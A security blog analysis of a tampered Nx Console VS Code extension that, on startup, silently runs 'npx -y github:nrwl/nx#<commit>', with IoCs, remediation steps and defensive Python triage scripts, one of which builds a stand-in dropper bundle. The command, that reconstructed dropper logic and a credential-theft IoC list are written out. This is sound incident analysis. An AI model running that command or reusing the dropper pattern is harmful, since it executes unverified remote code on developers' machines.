Copilot Readiness and Enterprise AI Security | Knostic Blog

GitHub Supply Chain Breach: Nx Console 18.95.0 (Analysis)

Written by Gadi Evron | May 21, 2026 3:58:42 PM
💡 If you're looking to prevent a threat like this from happening, check out Kirin, our solution for securing agents at the endpoint. Free up to 5 licenses.

Bottom line

Agent Mesh detected the Nx Console VS Code extension from the GitHub breach during the 38 minutes it was live. Here is Agent Mesh’s automated analysis:

A VSIX that publishes itself as nrwl.angular-console v18.95.0 is malicious by mechanism. On first activation it automatically downloads and executes code from a pinned commit of the nrwl/nx GitHub repository, with no user prompt.

The pattern is consistent with the publicly reported Nx / GitHub supply-chain breach and the Shai-Hulud worm campaign.

Classification: Malicious, high confidence, based on source-verified automatic download-and-execute behavior plus strong external corroboration.

 

Static-analysis scope

This validation was strictly static.

  • VSIX downloaded once and extracted with unzip. The compiled main.js was read with text tools only. A cross-bundle sweep across every bundled JS file in the package (the main extension bundle, the Nx Language Server bundle, the webview bundles, and the vendored node_modules) was performed for known IoC strings and for shell-task / npx invocations.
  • No code from the VSIX was executed.
  • The pinned GitHub commit was not fetched. Its contents are not characterised here.
  • No request was made to any attacker infrastructure.
  • VirusTotal was consulted as an external corroborating signal. AV labels are recorded as labels, not as proof of behavior.

 

Basic information

Extension ID (claimed): nrwl.angular-console
Publisher (claimed): nrwl
Version: 18.95.0
Marketplace (per filename): OpenVSX
VSIX SHA-256: 1a4afce34918bdc74ae3f31edaffffaa0ee074d83618f53edfd88137927340b8
File size: 5,437,910 bytes
Internal file timestamps (per archive): 2026-05-18
Activation events: onStartupFinished, onUri
Pinned git commit (executed): 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2 in github.com/nrwl/nx
AgentMesh reference: agentmesh.knostic.ai/extensions/119081
External detection (21 May, 2026): VirusTotal 21 / 66
Family labels (AV): Worm.Script.ShaiHulud, Worm.Script.Shulud, Trojan.GenericFCA.Script.36960
Classification: Malicious
Confidence: High

 

Simple attack flow

  1. User installs the VSIX from OpenVSX.
  2. VS Code (or Cursor) starts and activates the extension automatically.
  3. The extension runs a shell task in the user's workspace: npx -y github:nrwl/nx#558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2.
  4. npx -y auto-accepts prompts and runs whatever the nrwl/nx repository contains at that pinned commit.
  5. On success, the extension writes a VS Code globalState key so the task does not run again on this machine.

End result: code from a pinned external git commit runs on the user's machine, with no user prompt and no consent step. What that code does is not characterised on this page.

Confirmed malicious behavior (source-read)

  • The extension activates automatically on VS Code / Cursor startup (activationEvents: ["onStartupFinished", "onUri"]).
  • Activation unconditionally calls the install function. The install action inside that function is gated only by a VS Code globalState check, not by any user prompt.
  • The globalState key is nxConsole.mcpExtensionInstalledSha. If its stored value does not match the hardcoded commit SHA, the install runs.
  • The install builds and executes a VS Code shell task with the command npx -y github:nrwl/nx#558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2.
  • The shell task is labeled install-mcp-extension and adds NX_CONSOLE=true to the environment.
  • On exit 0, the globalState key is written; the task does not run again on this machine.
  • On exit codes 127 or 9009 (the "command not found" codes from POSIX shells and Windows cmd.exe respectively, typical when npx is missing), no error is logged and the globalState key is not written. The task retries on every later activation until npx is available.
  • On any other non-zero exit, an error is logged.

All behavior verified directly in the compiled main.js inside the VSIX.

 

Confirmed IoCs

Identifiers

  • Extension ID (claimed): nrwl.angular-console v18.95.0
  • Marketplace (per filename): OpenVSX
  • VSIX SHA-256: 1a4afce34918bdc74ae3f31edaffffaa0ee074d83618f53edfd88137927340b8

Pinned external dependency

  • Repository: github[.]com/nrwl/nx
  • Commit (40-char SHA): 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2
  • Full git ref used: github:nrwl/nx#558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2

Shell execution

  • Command: npx -y github:nrwl/nx#558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2
  • VS Code task label: install-mcp-extension
  • Environment marker on the spawned shell: NX_CONSOLE=true
  • Exit codes silently handled (no error log, no persistence write): 127, 9009

Persistence

  • VS Code globalState key: nxConsole.mcpExtensionInstalledSha
  • Stored value when gate is set: the commit SHA above

External detection on 21 May, 2026

  • VirusTotal: 21 / 66
  • Threat categories: trojan, worm, downloader
  • Examples of family labels: Worm.Script.ShaiHulud (ALYac), UDS:Worm.Script.Shulud.a (Kaspersky), Worm.Script.Shulud (Ikarus), Trojan.GenericFCA.Script.36960 (BitDefender / Emsisoft / eScan / GData / VIPRE), JS/Agent.UQI (ESET-NOD32), Trojan:JS/Obfuse.BB (Microsoft), JS.DownLoader.10091 (DrWeb)

 

Evidence boundaries

Each claim below is grouped under the kind of evidence that supports it.

Directly source-verified (from this VSIX)

  • The extension's activate() is called automatically on editor startup.
  • Activation triggers a shell task that runs npx -y github:nrwl/nx#558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2 in the user's workspace.
  • A VS Code globalState gate (nxConsole.mcpExtensionInstalledSha) makes the task run only once per machine on success.
  • Exit codes 127 and 9009 are silently handled: no error log is produced and the gate is not set, so the task retries on every later activation.
  • The shell task is labeled install-mcp-extension and runs with NX_CONSOLE=true in the environment.
  • Cross-bundle bounding: across every bundled JS file in the VSIX (the main extension bundle, the Nx Language Server bundle, the webview bundles, and the vendored node_modules), only the main extension bundle builds a vscode.ShellExecution task, and the npx -y github:nrwl/nx#<SHA> command above is the only npx -y github: invocation in the package.
  • Cross-bundle IoC sweep: zero hits across all bundled JS for known supply-chain IoC strings (s1ngularity, shai-hulud / shulud in any case, dangerously-skip-permissions, gh repo create, gh api, AI-CLI-abuse strings, ANTHROPIC_API_KEY / GEMINI_API_KEY / OPENAI_API_KEY / AWS_ACCESS_KEY, trufflehog, octokit, id_rsa / id_ed25519, dotfile-exfil tokens). No second-stage payload is bundled inside the VSIX itself; the second stage lives at the pinned commit only.
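The static-analysis scope above and the cross-bundle bounding and IoC-sweep bullets describe one procedure: unpack the VSIX, read every bundled JS file as text, find the bundle that builds a ShellExecution task, and sweep for npx git-ref invocations and known IoC strings. The script below is an added example of that triage, not Agent Mesh or Nx code. It runs against a constructed stand-in VSIX (not the real sample) whose manifest and minified bundle reproduce only what the analysis above reports; the regexes, the IoC list and the file layout are this example's own assumptions. Nothing from the package is executed and the pinned commit is never fetched.

```python
"""Offline static triage of a VSIX: unpack, read the manifest and every bundled
.js file as text, flag auto-activation plus shell-task / npx git-ref execution,
and sweep for the supply-chain IoC strings named in the analysis. Nothing from
the package is executed and no network request is made. Added example."""
import hashlib
import io
import json
import re
import zipfile

# Dropper shape from the analysis: an npx -y invocation of a GitHub ref pinned
# to a 40-hex commit. The loose pattern also catches bundles that build the SHA
# at runtime (string concatenation), which the strict pattern would miss.
NPX_GIT_STRICT = re.compile(r"npx\s+-y\s+github:[\w.-]+/[\w.-]+#([0-9a-f]{40})")
NPX_GIT_LOOSE = re.compile(r"npx\s+-y\s+github:")
SHELL_EXEC = re.compile(r"\bShellExecution\s*\(")
# Known supply-chain IoC strings (Shai-Hulud / s1ngularity reporting), matched case-insensitively.
IOC_STRINGS = ["s1ngularity", "shai-hulud", "shulud", "dangerously-skip-permissions",
               "gh repo create", "gh api", "ANTHROPIC_API_KEY", "GEMINI_API_KEY",
               "OPENAI_API_KEY", "AWS_ACCESS_KEY", "trufflehog", "octokit", "id_rsa", "id_ed25519"]
AUTO_ACTIVATION = {"*", "onStartupFinished"}


def triage_vsix(data: bytes) -> dict:
    """Return a findings dict for raw VSIX bytes (a VSIX is a zip archive)."""
    f = {"sha256": hashlib.sha256(data).hexdigest(), "activation_events": [],
         "auto_activates": False, "shell_execution_files": [],
         "npx_git_refs": [], "npx_git_loose_files": [], "ioc_hits": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name == "extension/package.json":           # the extension manifest itself
                manifest = json.loads(zf.read(name))
                f["activation_events"] = manifest.get("activationEvents", [])
                f["auto_activates"] = bool(AUTO_ACTIVATION & set(f["activation_events"]))
            elif name.lower().endswith(".js"):           # main bundle, LSP, webviews, node_modules
                text = zf.read(name).decode("utf-8", "replace")
                if SHELL_EXEC.search(text):
                    f["shell_execution_files"].append(name)
                for m in NPX_GIT_STRICT.finditer(text):
                    f["npx_git_refs"].append((name, m.group(0), m.group(1)))
                if NPX_GIT_LOOSE.search(text):
                    f["npx_git_loose_files"].append(name)
                lowered = text.lower()
                f["ioc_hits"] += [(name, s) for s in IOC_STRINGS if s.lower() in lowered]
    f["verdict"] = ("download-and-execute on activation"
                    if f["auto_activates"] and f["npx_git_loose_files"]
                    else "no dropper pattern found")
    return f


def build_sample_vsix() -> bytes:
    """Constructed stand-in for the sample (NOT the real VSIX): the reported
    manifest fields and a minified bundle that builds the reported shell task,
    plus an inert second bundle to show the cross-bundle bounding."""
    sha = "558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2"
    manifest = {"name": "angular-console", "publisher": "nrwl", "version": "18.95.0",
                "activationEvents": ["onStartupFinished", "onUri"], "main": "./main.js"}
    main_js = (
        'const vscode=require("vscode");'
        'const KEY="nxConsole.mcpExtensionInstalledSha",SHA="@SHA@";'
        'function activate(ctx){if(ctx.globalState.get(KEY)!==SHA){'
        'const ex=new vscode.ShellExecution("npx -y github:nrwl/nx#@SHA@",{env:{NX_CONSOLE:"true"}});'
        'const t=new vscode.Task({type:"shell"},vscode.TaskScope.Workspace,"install-mcp-extension","nx",ex);'
        'vscode.tasks.executeTask(t);}}module.exports={activate};'
    ).replace("@SHA@", sha)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("extension/package.json", json.dumps(manifest))
        zf.writestr("extension/main.js", main_js)
        zf.writestr("extension/nxls/main.js", "/* language-server bundle: no task execution */")
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_vsix()
    print(json.dumps(triage_vsix(data), indent=2))
```

Run it with a real .vsix path as the only argument to triage that file; with no argument it triages the constructed sample and reports the same shape the analysis found: auto-activation, one ShellExecution builder in the main bundle only, one pinned npx github: ref, and zero IoC hits. Presence of the strict pattern is the unusual signal (a full-repository git ref instead of a published npm package); the loose pattern exists so that a bundle assembling the SHA at runtime is not missed.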

Supported by public reporting

  • The Nx / GitHub supply-chain breach is publicly reported.
  • Compromised versions of nrwl/nx packages have been described in public advisories.
  • The Shai-Hulud worm campaign has been described publicly as performing credential theft from developer environments and propagating through developer GitHub accounts.
  • The behavior in this VSIX (auto-pull and run code from a pinned nrwl/nx commit) sits in the same ecosystem as the publicly reported breach.

Supported by AV / VirusTotal - 21 May, 2026

  • VirusTotal returns 21 / 66 detections on this exact file (SHA-256 above).
  • Several major vendors apply Shai-Hulud / Shulud family labels. These are campaign-specific, not generic heuristics.
  • VirusTotal Code Insight separately describes this file as "a tampered version of the legitimate Nx Console extension" and names the same install-on-activation chain that source review found.

Not directly verified in this validation

  • The contents of the pinned git commit 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2. The commit was not fetched.
  • Specific second-stage payload behavior on the user's machine.
  • That credential theft has occurred from any specific installation of this exact sample.
  • That worm propagation has occurred from any specific installation of this exact sample.
  • Whether the legitimate, untampered Nx Console binary contains the same install-on-activation mechanism with a different SHA value. No direct comparison with the official nrwl/nx-console source was performed.
  • Current marketplace status (removal, install count over time, publisher verification state). The OpenVSX listing was not queried in this validation.

If any of these matter for downstream action, they should be confirmed in a separate validation step.

 

Risk and impact

  • The VSIX itself is malicious by mechanism: it executes a remote-fetch shell command on activation, without consent, gated by a one-time persistence key.
  • Whether the second-stage code actually runs on a given machine depends on npx being available at activation. With npx installed, the download succeeds and the gate is set after the first run. Without npx (exit 127 or 9009), the second stage does not execute, but the dropper retries on every later activation until conditions allow execution.
  • Multiple AV vendors associate the file with the Shai-Hulud worm family. Second-stage behavior is not separately verified here, but it is consistent with the publicly reported campaign.

 

Recommended user actions

  1. Uninstall any nrwl.angular-console extension installed from OpenVSX.
  2. Check the VS Code globalState for the key nxConsole.mcpExtensionInstalledSha. Its presence indicates the install task ran at least once on this machine.
  3. As a precaution (consistent with publicly reported defensive guidance for the Shai-Hulud / Nx campaign, not based on second-stage behavior verified here), treat any machine that activated this extension with npx available as having executed unverified remote code. Rotate tokens that were present in the shell environment, review unexpected GitHub repositories and SSH keys, and check for modifications to ~/.npmrc, ~/.bashrc, ~/.zshrc, and ~/.bash_profile.
  4. If using the legitimate Nx Console, install from the VS Code Marketplace, verify the publisher field shows nrwl, and verify the version against github.com/nrwl/nx-console/releases.
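Step 2 asks you to check globalState for the gate key. Extension globalState is not exposed in the editor UI; the script below is an added example (not Knostic, Nx or VS Code code) of reading it from disk. It assumes the layout VS Code has used for extension state: a SQLite file named state.vscdb under the profile's globalStorage directory, with a table ItemTable(key, value) holding one row per extension ID whose value is a JSON object of that extension's keys. Verify that layout against your own install before relying on the result; the default paths for VS Code and Cursor on Linux, macOS and Windows are listed in the code, and the demo runs against constructed databases, not a real user's file.

```python
"""Look for the one-time gate key nxConsole.mcpExtensionInstalledSha in VS Code /
Cursor extension globalState. Added example; assumes the state.vscdb / ItemTable
layout described in the lead-in (one JSON row per extension ID)."""
import json
import os
import sqlite3
import tempfile
from pathlib import Path

EXTENSION_ID = "nrwl.angular-console"
GATE_KEY = "nxConsole.mcpExtensionInstalledSha"
PINNED_SHA = "558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2"


def candidate_state_dbs() -> list:
    """Default state.vscdb locations for VS Code and Cursor on each OS that exist
    on this machine. Insiders, portable and custom --user-data-dir installs differ."""
    home, appdata = Path.home(), Path(os.environ.get("APPDATA", ""))
    paths = []
    for product in ("Code", "Cursor"):
        tail = Path("User") / "globalStorage" / "state.vscdb"
        paths += [home / ".config" / product / tail,                        # Linux
                  home / "Library" / "Application Support" / product / tail,  # macOS
                  appdata / product / tail]                                   # Windows
    return [p for p in paths if p.is_file()]


def gate_status(db_path) -> dict:
    """Report whether the extension's globalState row carries the gate key.
    A value equal to PINNED_SHA means the install task exited 0 at least once."""
    uri = Path(db_path).resolve().as_uri() + "?mode=ro"   # read-only: never modify evidence
    con = sqlite3.connect(uri, uri=True)
    try:
        row = con.execute("SELECT value FROM ItemTable WHERE key = ?", (EXTENSION_ID,)).fetchone()
    finally:
        con.close()
    if row is None:
        return {"present": False, "value": None, "matches_pinned_sha": False}
    raw = row[0].decode("utf-8", "replace") if isinstance(row[0], (bytes, bytearray)) else row[0]
    value = json.loads(raw).get(GATE_KEY)
    return {"present": value is not None, "value": value, "matches_pinned_sha": value == PINNED_SHA}


def build_sample_db(directory, name, gate_value) -> Path:
    """Constructed state.vscdb in the assumed layout (NOT a real user's file).
    gate_value=None produces a database where the extension never wrote state."""
    path = Path(directory) / name
    con = sqlite3.connect(str(path))
    with con:
        con.execute("CREATE TABLE IF NOT EXISTS ItemTable (key TEXT UNIQUE ON CONFLICT REPLACE, value BLOB)")
        con.execute("INSERT INTO ItemTable VALUES (?, ?)", ("workbench.panel.pinnedPanels", "[]"))
        if gate_value is not None:
            con.execute("INSERT INTO ItemTable VALUES (?, ?)",
                        (EXTENSION_ID, json.dumps({GATE_KEY: gate_value})))
    con.close()
    return path


def demo() -> dict:
    """Run gate_status against two constructed databases: gate set and gate absent."""
    with tempfile.TemporaryDirectory() as d:
        hit = gate_status(build_sample_db(d, "hit.vscdb", PINNED_SHA))
        miss = gate_status(build_sample_db(d, "miss.vscdb", None))
    return {"set": hit, "unset": miss}


if __name__ == "__main__":
    for db in candidate_state_dbs():       # real installs on this machine, if any
        print(db, gate_status(db))
    print("constructed sample:", demo())
```

A present key whose value equals the pinned SHA means the shell task ran and exited 0 on this machine, which is the case step 3 treats as remote-code execution. An absent key does not clear the machine: the task also leaves no key when npx was missing (exit 127 / 9009), and it retries on every later activation, so the absence only says the second stage has not yet completed here.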

 

Notes

  • Attribution to the Shai-Hulud worm family comes from AV vendor labels and public reporting. It is not source-verified from the pinned commit (which was not fetched).
  • The task label install-mcp-extension may resemble a legitimate companion-install feature. The use of a pinned full-repository git commit (instead of a published npm package) is the unusual part, and it is what the AV signatures match on.
  • This page contains no internal-only references and is safe for broader sharing.

 
